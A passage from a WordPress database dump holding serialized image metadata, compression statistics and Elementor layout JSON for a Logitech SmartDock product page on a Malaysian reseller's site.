9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:21:\"smartdock-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:19:\"smartdock-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6046,3034,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:19.010445543456565786755163571797311305999755859375;s:5:\"bytes\";i:8572;s:11:\"size_before\";i:45091;s:10:\"size_after\";i:36519;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:398;s:11:\"size_before\";i:3392;s:10:\"size_after\";i:2994;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.7599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:642;s:11:\"size_before\";i:4073;s:10:\"size_after\";i:3431;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.32000000000000028421709430404007434844970703125;s:5:\"bytes\";i:2620;s:11:\"size_before\";i:13564;s:10:\"size_after\";i:10944;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:14.449999999999999289457264239899814128875732421875;s:5:\"bytes\";i:567;s:11:\"size_before\";i:3925;s:10:\"size_after\";i:3358;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:20.0799999999999982946974341757595539093017578125;s:5:\"bytes\";i:1653;s:11:\"size_before\";i:8231;s:10:\"size_after\";i:6578;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:22.6099999999999994315658113919198513031005859375;s:5:\"bytes\";i:2692;s:11:\"size_before\";i:11906;s:10:\"size_after\";i:9214;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(6047,3035,'_wp_attached_file','2019/03/smartdock-1.jpg'),(6048,3035,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:23:\"2019/03/smartdock-1.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"smartdock-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"smartdock-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"smartdock-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"smartdock-1-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"smartdock-1-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"smartdock-1-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"smartdock-1-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6049,3035,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.44890195400311228013379150070250034332275390625;s:5:\"bytes\";i:4886;s:11:\"size_before\";i:57830;s:10:\"size_after\";i:52944;s:4:\"time\";d:0.0799999999999999877875467291232780553400516510009765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.54999999999999982236431605997495353221893310546875;s:5:\"bytes\";i:232;s:11:\"size_before\";i:3071;s:10:\"size_after\";i:2839;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.55999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:339;s:11:\"size_before\";i:5165;s:10:\"size_after\";i:4826;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";i:10;s:5:\"bytes\";i:1873;s:11:\"size_before\";i:18734;s:10:\"size_after\";i:16861;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.70999999999999996447286321199499070644378662109375;s:5:\"bytes\";i:325;s:11:\"size_before\";i:4846;s:10:\"size_after\";i:4521;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.589999999999999857891452847979962825775146484375;s:5:\"bytes\";i:788;s:11:\"size_before\";i:10383;s:10:\"size_after\";i:9595;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.5;s:5:\"bytes\";i:1329;s:11:\"size_before\";i:15631;s:10:\"size_after\";i:14302;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(6050,3036,'_wp_attached_file','2019/03/smartdock-2.jpg'),(6051,3036,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:23:\"2019/03/smartdock-2.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"smartdock-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"smartdock-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"smartdock-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"smartdock-2-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"smartdock-2-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"smartdock-2-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"smartdock-2-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6052,3036,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:3.803680110218662147048007682315073907375335693359375;s:5:\"bytes\";i:5356;s:11:\"size_before\";i:140811;s:10:\"size_after\";i:135455;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.54000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:352;s:11:\"size_before\";i:6350;s:10:\"size_after\";i:5998;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:621;s:11:\"size_before\";i:12245;s:10:\"size_after\";i:11624;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.069999999999999840127884453977458178997039794921875;s:5:\"bytes\";i:1420;s:11:\"size_before\";i:46236;s:10:\"size_after\";i:44816;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:5.30999999999999960920149533194489777088165283203125;s:5:\"bytes\";i:624;s:11:\"size_before\";i:11758;s:10:\"size_after\";i:11134;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:4;s:5:\"bytes\";i:1032;s:11:\"size_before\";i:25777;s:10:\"size_after\";i:24745;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:3.399999999999999911182158029987476766109466552734375;s:5:\"bytes\";i:1307;s:11:\"size_before\";i:38445;s:10:\"size_after\";i:37138;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(6053,3037,'_wp_attached_file','2019/03/smartdock-3.jpg'),(6054,3037,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:930;s:6:\"height\";i:523;s:4:\"file\";s:23:\"2019/03/smartdock-3.jpg\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"smartdock-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"smartdock-3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"smartdock-3-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"onepress-blog-small\";a:4:{s:4:\"file\";s:23:\"smartdock-3-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"onepress-small\";a:4:{s:4:\"file\";s:23:\"smartdock-3-480x300.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"onepress-medium\";a:4:{s:4:\"file\";s:23:\"smartdock-3-640x400.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"swift_performance_lazyload\";a:4:{s:4:\"file\";s:21:\"smartdock-3-20x11.jpg\";s:5:\"width\";i:20;s:6:\"height\";i:11;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6055,3037,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.14012212478765917467171675525605678558349609375;s:5:\"bytes\";i:8865;s:11:\"size_before\";i:108905;s:10:\"size_after\";i:100040;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:8;s:5:\"bytes\";i:432;s:11:\"size_before\";i:5401;s:10:\"size_after\";i:4969;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.6699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:684;s:11:\"size_before\";i:8916;s:10:\"size_after\";i:8232;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.25;s:5:\"bytes\";i:2900;s:11:\"size_before\";i:35143;s:10:\"size_after\";i:32243;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.07000000000000028421709430404007434844970703125;s:5:\"bytes\";i:627;s:11:\"size_before\";i:8872;s:10:\"size_after\";i:8245;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.5600000000000004973799150320701301097869873046875;s:5:\"bytes\";i:1685;s:11:\"size_before\";i:19693;s:10:\"size_after\";i:18008;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.2200000000000006394884621840901672840118408203125;s:5:\"bytes\";i:2537;s:11:\"size_before\";i:30880;s:10:\"size_after\";i:28343;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(6056,3031,'_elementor_data','[{\"id\":\"e24bb76\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"49cb1ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"22c9bdb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SMARTDOCK<\\/h2><p>Secure meeting room console designed for Skype Room Systems<\\/p><ul><li>Securely mount Surface\\u2122 Pro in any conference room<\\/li><li>Start your Skype for Business meeting with one-touch join<\\/li><li>Add connectivity without clutter<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bc9889\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f6b5486\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-1.png\",\"id\":3033}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5300311\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"185d208\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"12eaaab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SMARTDOCK MAKES SKYPE ROOMS EASY<\\/h2><p>Add video collaboration to any room with Logitech\\u00ae SmartDock for Skype Room Systems and start every meeting with just one touch. Meeting organizers enjoy the familiar Skype for Business interface, and IT admins appreciate the easily deployed and managed Windows\\u00ae 10 Skype meeting app.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0f09081\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1222d0a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"868fa53\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"c500ae9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"30eb069\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b14b9de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c996fe6\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/youtu.be\\/EqZbHTEVfvA\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"cdc9177\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"333fa79\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR SKYPE FOR BUSINESS<\\/h3><p>Logitech SmartDock meeting room solution, designed for Microsoft Skype\\u00ae for Business, works beautifully with your existing video displays and video cameras certified for Skype for Business, making it easy to launch a meeting with a single touch.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fc04271\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1c378bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"a4beb86\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SECURELY LOCKS SURFACE PRO<\\/h3><p>SmartDock is an AV control console and powered mount with Kensington\\u00ae security slot for added protection. Confidently leave a Surface\\u00ae Pro unattended in any conference room where SmartDock is installed. Convenience for meeting organizers, peace of mind for IT.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6b27b08\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3bfea6c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock.jpg\",\"id\":3034}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458aa85\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4d634bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"a9587d9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-1.jpg\",\"id\":3035}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2644878\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"88f77cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ADDS CONNECTIVITY WITHOUT CLUTTER<\\/h3><p>SmartDock adds all the connectivity you could want, including HDMI for dual 1080p displays, three USB ports, Gigabit Ethernet, and headset jack. The optional SmartDock Flex expansion kit consolidates HDMI, USB and power to a single CAT6 cable for a clutter-free conference table.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c1e3e62\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9afb26a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"afc2bb6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SIMPLIFIES CONTENT SHARING<\\/h3><p>When you need to share a presentation, demo, or other content on your laptop, simply connect through the HDMI input built into SmartDock and begin presenting from your personal device.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4df46a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dcde8ca\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-2.jpg\",\"id\":3036}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"705260b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ece995b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2a41a9a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-3.jpg\",\"id\":3037}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c0ed16d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\"},\"elements\":[{\"id\":\"8d03f27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>COMPLETE THE EXPERIENCE<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">All Logitech ConferenceCams are certified for Skype for Business, providing an affordable option for any meeting room. HD-quality video and audio enhance the Skype meeting experience for superior group collaboration.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e3a52b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"3cdc1fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"space_between_widgets\":-11},\"elements\":[{\"id\":\"145cf08\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b612093\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"491e24c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"67df618\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4f33f87\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>PIVOTING, CAST-METAL SUPPORT PLATFORM<\\/h4><p>The sturdy, elegantly designed base provides a premium mount for Surface Pro with sleek industrial design.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5358850\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"65020ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EXTENDED I\\/O FOR SURFACE PRO<\\/h4><p>Supports a wide variety of deployments and device connectivity with dual 1080p display ports, an HDMI input for 1080p60 content sharing, three USB 3.1 type A ports, Gigabit Ethernet, and a headset mini-plug.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1283944\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bbe9fd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>ENERGY-SAVING HIBERNATION<\\/h4><p>An IR sensor conveniently wakes the system when motion is detected in the meeting space and enables energy saving hibernation mode when the room is empty.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3ad2c4f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7a14c34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>DESIGNED IN PARTNERSHIP WITH MICROSOFT<\\/h4><p>Close collaboration between Logitech and Microsoft ensures full and seamless integration with Surface Pro and Skype Room System. In addition to SmartDock, all Logitech ConferenceCams are Certified for Skype for Business.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cebd381\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"498ce51\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"64b49a5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>SUPERIOR CABLE MANAGEMENT<\\/h4><p>The optional SmartDock Flex expansion kit makes it easy to manage cabling between the conference table and the front of the room. With a low-profile base for SmartDock and an easily-concealable extender box, SmartDock Flex consolidates USB, dual HDMI, data, and power to a single CAT6 cable. With a maximum cable length of 15 m, installers can position SmartDock anywhere in the room while running cable through standard 21mm conduit.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7bd1a69\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a733024\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>EASY ACCESS TO ROOM AV<\\/h4><p>Need to join a meeting outside the Microsoft ecosystem? When deployed with the optional SmartDock Flex expansion kit, SmartDock makes the room\\u2019s camera, speakerphone, and display accessible to a user\\u2019s laptop. This way, equipment in Skype rooms can be used with Cisco WebEx, Zoom, BlueJeans, and most any meeting or webinar software.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"40d4a0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"80afd57\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(6057,3038,'_wp_page_template','template-fullwidth.php'),(6058,3038,'_elementor_edit_mode','builder'),(6059,3038,'_elementor_template_type','post'),(6060,3038,'_elementor_data','[{\"id\":\"e24bb76\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"49cb1ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"22c9bdb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SMARTDOCK<\\/h2><p>Secure meeting room console designed for Skype Room Systems<\\/p><ul><li>Securely mount Surface\\u2122 Pro in any conference room<\\/li><li>Start your Skype for Business meeting with one-touch join<\\/li><li>Add connectivity without clutter<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bc9889\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f6b5486\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/smartdock-1.png\",\"id\":3033}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5300311\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"185d208\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"12eaaab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>SMARTDOCK MAKES SKYPE ROOMS EASY<\\/h2><p>Add video collaboration to any room with Logitech\\u00ae SmartDock for Skype Room Systems and start every meeting with just one touch. Meeting organizers enjoy the familiar Skype for Business interface, and IT admins appreciate the easily deployed and managed 